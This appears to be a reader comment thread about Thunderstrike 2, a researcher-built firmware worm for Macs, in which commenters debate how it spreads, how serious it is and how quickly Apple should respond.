Of all the alleged Mac "hacks" that have surfaced over the years, this is the only one that has seemed to be a legitimate concern to me. The other hacks usually required direct access to your computer or installing some shady torrent software after putting in an admin password. This thing can be remotely installed from a website and can't be wiped. Sure, don't visit a shady website you say. But if a web server is compromised in some other way and this hack is installed, you could get it from nearly anywhere. This is bad.



Whoever wanted to download that and open a terminal? The user is the main problem here. Enough said.
 
Is there a list of Macs known to be susceptible to this, or is it all of them? I was looking at (eventually) getting a new iMac, but now not so sure.

And before any fanboys share their "0.2" - I take security very seriously, and while I love Apple, I'm not going to invest in such an expensive machine with doors like this wide open.
 
Just to translate to plain English:
"Thunderstrike 2, unlike the first demonstration of Thunderstrike, is able to infect a Mac remotely through a malicious website or email."
Translation:
"You receive a link via email or web sites, download the malicious firmware, install it as root after entering administrator password"
It's not something that happens alone. It's like complaining someone robbed your house and it turns out you gave them the keys.
 
It's crazy that someone has this kind of time on their hands. I'd love to hire them to work on my latest App design but they are busy hacking away at the Mac.
Agreed. However the way I see it, this is a double-edged sword. On the one hand these 'researchers' help Apple and the Mac community-at-large by pointing out vulnerabilities that can then be addressed, but they also highlight these weak spots to those malicious hackers that are ready to pounce during that limited window of opportunity, before patches are in place.

Apple for obvious reasons has seemed to be taking their time to respond to these various exploits. Most often these legitimate researchers contact Apple first, before publicly releasing their findings to give Apple time to address the problem, before the vulnerability is exposed for all to read.
 
Apple for obvious reasons has seemed to be taking their time to respond to these various exploits.


What obvious reasons? - I think it's pertinent to fix this ASAP. Any lallygagging around is pretty inexcusable. Apple responding to these threats as quick as possible can only lead to good things, or am I missing something?
 
I think the keyword here is "firmware". Just like the original Thunderstrike, it involves plugging in a rogue Thunderbolt cable or accessory. That's the freaking attack vector. So... if you don't plug in anything that you don't trust, then you can't be compromised. Sure, if you are willy-nilly plugging an infected Thunderbolt cable into multiple computers, it can infect them, yada yada... but the issue here is it has to start with infected hardware which a) doesn't exist in the wild, b) would replicate very slowly.

Just saying... not doomsday stuff here... and Apple will fix it in less than a month.
 
Apple is so screwy that they don't know the meaning of security. It's ironic that Cook and his friends believe in security and privacy and yet are vulnerable to a worm attack. Stop focusing on jailbreak and focus on overall security. People, don't forget what Snow Leopard..
 
What obvious reasons? - I think it's pertinent to fix this ASAP. Any lallygagging around is pretty inexcusable. Apple responding to these threats as quick as possible can only lead to good things, or am I missing something?
I hear what you're saying, they have a responsibility to act on this asap.

There is however a fine line between (A) immediately publicly acknowledging the problem and by such recognition focussing even more attention to the problem, and perhaps creating fear and uncertainty in the Mac community (while they are perhaps still struggling to determine the scope of the problem and while they are still in the process of developing a working and foolproof patch), and (B) quietly and diligently working to create a permanent solution to solve the exploit, as you can bet your bottom dollar they are.
 

There were some issues with the way that data was represented, read your own linked ZDNet article for more info.
 
"First Firmware Worm Able to Infect Macs Created by Researchers"

So these researchers created Macs? Poor grammar, you need to go back to school, Macrumors.
 
I think the keyword here is "firmware". Just like the original Thunderstrike, it involves plugging in a rogue Thunderbolt cable or accessory. That's the freaking attack vector. So... if you don't plug in anything that you don't trust, then you can't be compromised. Sure, if you are willy-nilly plugging an infected Thunderbolt cable into multiple computers, it can infect them, yada yada... but the issue here is it has to start with infected hardware which a) doesn't exist in the wild, b) would replicate very slowly.
Maybe, maybe not. A guy walks up to a convenience charging station in the gate area at ATL. His MacBook (with one, universal port) is pre-infected (intentionally?) with this malware. It transfers to the Thunderbolt/USB-C at the charging station. Now every subsequent user of that charging station will be infected. The same could happen at libraries, A/V presentation situations ("oh you forgot your cable, here borrow this one..."), etc.

The only real fix is to trash all existing Thunderbolt peripherals and cables and replace them with updated, more secure versions. How likely is that?
 
Err, no it won't. We all know how rubbish Apple is when it comes to security so if you think El Capitan will make your Mac bulletproof then you need to get some help.
We all know how rubbish everyone is when it comes to security. XD
Seriously, there have been major breaches everywhere recently. Most of the Unix world fell victim to the Bash bug and those OpenSSL messes. Perhaps the only way Apple did worse was by not having an "apt-get" command in OS X to install individual patches. Ironically, the only big platform for which there hasn't been an egregious vulnerability exposed has been Microsoft Windows, but maybe it's because it's no longer news at this point if it happens.

I never used to suspect that the government was planting vulnerabilities, but there have been some ridiculous breaches discovered...
 
Of all the alleged Mac "hacks" that have surfaced over the years, this is the only one that has seemed to be a legitimate concern to me. The other hacks usually required direct access to your computer or installing some shady torrent software after putting in an admin password. This thing can be remotely installed from a website and can't be wiped. Sure, don't visit a shady website you say. But if a web server is compromised in some other way and this hack is installed, you could get it from nearly anywhere. This is bad.
Also all the Flash and Java vulnerabilities, but they're usually discovered before too many have fallen victim, so I never worry.
 
Correct me if I'm wrong, but this doesn't necessarily sound like a worm to me.
They didn't describe how this works really - they said that malicious code can be delivered via email or a website... And then what? It still needs to be run, does it not? It won't just automatically run itself, will it?
That means it's a Trojan, not a worm, right? The only precaution a user needs to take is not running code that they shouldn't trust, and by default since Mountain Lion, you can't run unsigned code because of Gatekeeper, right?

It's not exactly a Trojan, and it won't be blocked by Gatekeeper, since it's an attack at the hardware/firmware level.

Malicious firmware can only infect your machine during the boot procedure, that is, even before the OS is loaded. You need to reboot your machine from an infected storage device (such as a USB stick); only then can the firmware be reprogrammed.

It's possible to spread the malicious code through a network connection, but the code must be applied to bootable media before it becomes infectious. And of course, the attackers will need to breach the victim's system, pass the Gatekeeper check, and gain root access before they can finally apply the code to some media. But those are off-topic issues for those researchers.

In short: the researchers "assumed" your system is already breached, AND the malicious code is already applied to bootable media, AND, for some mysterious reason, you choose to reboot from the infected media, so that your machine can finally get infected. Piece of cake, isn't it?

However, you may still want to keep an eye on it. While normal users won't need to worry about it too much, you should still be alert if you're an IT manager of schools or labs. The machines under your management could possibly be attacked if the users are allowed physical contact with the machines. Attackers could simply plug in a USB stick, reboot, and BOOM! You're breached.

Well that's the whole story, sort of.
 
There is also the fact that Windows versions are listed separately, but Mac OS versions are not. Adding together all of the Windows exploits gets you to 248 exploits, which is more than Apple's.

Good observation. Not only that, but Windows XP was left out, which accounts for roughly 20%. No Android listed?!? Considering they mentioned iOS.
 
At least with Windows 10 you know MS is snooping on everything by default. The whole OS is a trojan.
lol hey at least they are being honest.
Actually, Apple has already been infected by a worm.

It happened many years ago. It lay dormant, and bided its time, waiting for the right moment to begin its mission to turn Apple rotten. Its name is Tim.
What if every Mac is already infected with malware.
What if every Mac for the last decade has slowly and inconspicuously been infected by sleeper malware.
What if one day they all awake to become a massive super computer, everywhere and nowhere…

Transcendence.
 